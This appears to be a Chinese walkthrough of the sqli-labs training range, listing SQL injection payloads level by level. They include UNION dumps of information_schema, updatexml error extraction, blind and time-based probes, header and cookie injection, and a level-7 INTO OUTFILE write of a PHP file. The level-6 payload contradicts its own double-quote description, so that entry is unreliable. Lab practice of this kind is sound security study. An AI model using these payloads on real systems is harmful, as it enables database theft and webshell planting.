sql-labs靶场

第一关(get传参,单引号闭合,有回显,无过滤)

?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

第二关(get传参,无闭合,有回显,无过滤)

?id=-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') 

第三关(get传参,括号加单引号闭合,有回显,无过滤)

?id=-1') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

 第四关(get传参,括号加双引号闭合,有回显,无过滤)

?id=-1") union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

 第五关(get传参,单引号闭合,无回显有报错,无过滤)

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

第六关(get传参,双引号闭合,无回显有报错,无过滤)

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

第七关(get传参,单引号加两个括号闭合,无回显有报错,无过滤)写webshell

?id=-1')) union select 1,2,'<?php phpinfo();' into outfile "D:\\phpstudy\\phpstudy_pro\\WWW\\sqli\\Less-7\\a.php" --+

第八关(get传参,单引号闭合,无回显无报错,无过滤)

?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50--+

第九关(get传参,单引号闭合,页面无变化,无过滤)

?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50,sleep(3),0)--+

第十关(get传参,双引号闭合,页面无变化,无过滤)

?id=1" and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50,sleep(3),0)--+

第十一关(post传参,单引号闭合,有回显,无过滤)

a' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#

第十二关(post传参,双引号加括号闭合,有回显,无过滤)

a") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#

第十三关(post传参,单引号加括号闭合,无回显有报错,无过滤)

a') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

第十四关(post传参,双引号闭合,无回显有报错,无过滤)

a" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

第十五关(post传参,单引号闭合,页面无变化,无过滤)

admin' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50#

第十六关(post传参,双引号加括号闭合,页面无变化,无过滤)

admin") and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50#

第十七关(post传参,单引号闭合,无回显有报错)uname被过滤,通过password注入

aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1

第十八关(post传参,单引号闭合,无回显有报错)uname和password被过滤,通过uagen注入

aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1

第十九关(post传参,单引号闭合,无回显有报错)uname和password被过滤,通过referer注入

第二十关(post传参,单引号闭合,无回显有报错)uname和password被过滤,通过cookie注入

第二十一关(post传参,单引号闭合,无回显有报错)uname和password被过滤,通过cookie(base64)编码注入

第二十二关(post传参,双引号闭合,无回显有报错)uname和password被过滤,通过cookie(base64)编码注入

第二十三关(get传参,单引号闭合,有回显,有过滤)#,--被过滤了

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),1 and '1'='1

第二十四关(get传参,单引号闭合,有回显)二次注入

上一篇:网络安全(黑客)——自学2024


下一篇:工厂模式和抽象工厂模式的实验报告